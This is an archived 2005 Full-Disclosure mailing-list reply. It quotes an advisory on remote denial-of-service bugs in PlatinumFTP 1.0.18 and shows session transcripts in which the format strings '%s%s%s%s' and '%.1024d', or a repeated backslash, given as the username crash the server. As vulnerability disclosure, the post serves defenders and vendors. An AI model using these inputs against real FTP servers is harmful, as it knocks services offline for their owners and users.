Re: [Full-disclosure] PlatinumFTP 1.0.18 remote DoS
From: Gary H. Jones II (gary_at_pointblanksecurity.com)
Date: 03/12/05
- Previous message: Luke Macken: "[Full-disclosure] [ GLSA 200503-16 ] Ethereal: Multiple vulnerabilities"
- In reply to: ports: "[Full-disclosure] PlatinumFTP 1.0.18 remote DoS"
- Next in thread: ports: "Re: [Full-disclosure] PlatinumFTP 1.0.18 remote DoS"
- Reply: ports: "Re: [Full-disclosure] PlatinumFTP 1.0.18 remote DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: "ports" <ml@portsonline.net>, <full-disclosure@lists.grok.org.uk> Date: Sat, 12 Mar 2005 12:03:56 -0500
Reported in 2003 already... classic format string vulnerabilities
http://www.derkeiler.com/Mailing-Lists/Securiteam/2003-12/0080.html
-gary
----- Original Message -----
From: "ports" <ml@portsonline.net>
To: <full-disclosure@lists.grok.org.uk>
Sent: Saturday, March 12, 2005 11:57 AM
Subject: [Full-disclosure] PlatinumFTP 1.0.18 remote DoS
> Application: PlantinumFTP
> Site: http://www.roboshareware.com/indexplatinumftp.php
> Version: 1.0.18 and maybe lower
> OS: Windows
> Bug: Remote Denial of Service
>
>
> =====
> Product:
> PlatinumFTPserver simplifies management of all your Ftp clients with
> regards to sending and receiving program and data files over an IP
> connection.
>
>
> =====
> About:
> I didn't found any informations about the Bugs I've found and the
> vendor doesn't seem to be interested in fixing problems (see History).
> Since PlatinumFTP isn't a mainstream server I decided to make this
> Disclosure.
>
> Well, I found 3 different ways do shut down (denial of service) a
> PlatinumFTP 1.0.18 server. At least you doesn't need a valid user.
>
>
> =====
> First Bug:
> You can stop the server using %s%s%s%s as username.
>
> -------------------- schnipp --------------------
> ports@boom:~$ ftp 192.168.10.101
> Connected to 192.168.10.101.
> 220-PlatinumFTPserver V1.0.18
> 220 Enter login details
> Name (192.168.10.101:ports): %s%s%s%s
> 421 Service not available, remote server has closed connection
> Login failed.
> No control connection for command: Transport endpoint is not connected
> ftp>
> -------------------- schnapp --------------------
>
>
> =====
> Second Bug:
> You can stop the server using %.1024d as username.
>
> -------------------- schnipp --------------------
> ports@boom:~$ ftp 192.168.10.101
> Connected to 192.168.10.101.
> 220-PlatinumFTPserver V1.0.18
> 220 Enter login details
> Name (192.168.10.101:ports): %.1024d
> 331 Password required for 000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 00000000000000000000000000000000000000000000000000000000000000000000000
> 000000000000000000000000000000421 Service not available, remote server
> has closed connection
> Login failed.
> No control connection for command: Transport endpoint is not connected
> ftp>
> -------------------- schnapp --------------------
>
>
> =====
> Third Bug:
> Well, shuting down a server using the third bug is, compared to the
> first Bugs, really tricky *cough*. If you put in a \ as username the
> Server will show a requester on his console saying 'Incorrect Format:
> HKEY_LOCAL_MACHINE\SOFTWARE\PlatinumFTPserver\Configuration\Users\'.
> The ftp login process for the current session will stop until someone
> affirmed this message.
>
> I wrote a little perl script to see if it's possible to shut the server
> down and it's working. You just have to connect a couple of times using
> the username \ and after a few connections (>50) the server will crash.
>
> Since most of you guys know how to write a script like that I doens't
> attach it :) Of course you can find them later on my homepage.
>
>
> =====
> History:
> 2005-03-05: Found the Bugs and mailed the vendor
> 2005-03-07: Mailed the vendor again using all mailaddresse I found
> 2005-03-10: Created a yahoo-account *sigh* to make a forum post
> 2005-03-12: Still no response...
>
>
>
> Well, now let's count the hours/days until someone is telling me I'm a
> fool because I didn't made a working exploit out of it.
>
>
> ports
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://www.secunia.com/
>
>
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://www.secunia.com/
- Previous message: Luke Macken: "[Full-disclosure] [ GLSA 200503-16 ] Ethereal: Multiple vulnerabilities"
- In reply to: ports: "[Full-disclosure] PlatinumFTP 1.0.18 remote DoS"
- Next in thread: ports: "Re: [Full-disclosure] PlatinumFTP 1.0.18 remote DoS"
- Reply: ports: "Re: [Full-disclosure] PlatinumFTP 1.0.18 remote DoS"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
